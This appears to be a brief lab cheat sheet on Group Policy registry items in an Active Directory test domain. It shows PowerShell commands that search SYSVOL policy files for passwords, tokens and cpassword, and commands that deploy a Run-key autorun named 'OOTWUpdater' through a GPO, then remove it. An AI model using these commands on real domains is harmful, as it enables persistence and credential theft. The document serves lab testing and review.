Registry policy and preference items let a GPO write configuration onto scoped systems. The same mechanism that deploys legitimate settings can also create autoruns, weaken controls, point software at attacker infrastructure, or leave secrets in XML.
Inspect registry policy files
Get-ChildItem "\\ootw.local\SYSVOL\ootw.local\Policies" -Recurse -Include Registry.pol,Registry.xml |
Select-Object FullName,LastWriteTime
Search registry preference XML
Get-ChildItem "\\ootw.local\SYSVOL\ootw.local\Policies" -Recurse -Include Registry.xml |
Select-String -Pattern "Run","RunOnce","password","secret","token","cpassword"
Set a registry value with native cmdlets
Set-GPRegistryValue -Name "Misconfigured Policy" `
-Key "HKLM\Software\OOTW" `
-ValueName "Marker" `
-Type String `
-Value "GPO applied"
Deploy a Run key for lab validation
Set-GPRegistryValue -Name "Misconfigured Policy" `
-Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" `
-ValueName "OOTWUpdater" `
-Type String `
-Value "cmd.exe /c whoami > C:\Windows\Temp\gpo-run.txt"
Check target registry
reg query HKLM\Software\OOTW
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Remove registry value
Remove-GPRegistryValue -Name "Misconfigured Policy" -Key "HKLM\Software\OOTW" -ValueName "Marker"
Remove-GPRegistryValue -Name "Misconfigured Policy" -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "OOTWUpdater"
Notes
Registry.pol is not plain text. Use GPMC, Get-GPRegistryValue, or dedicated parsers when reviewing it.
Preferences XML can be plain enough to review directly, and legacy preference items may contain cpassword.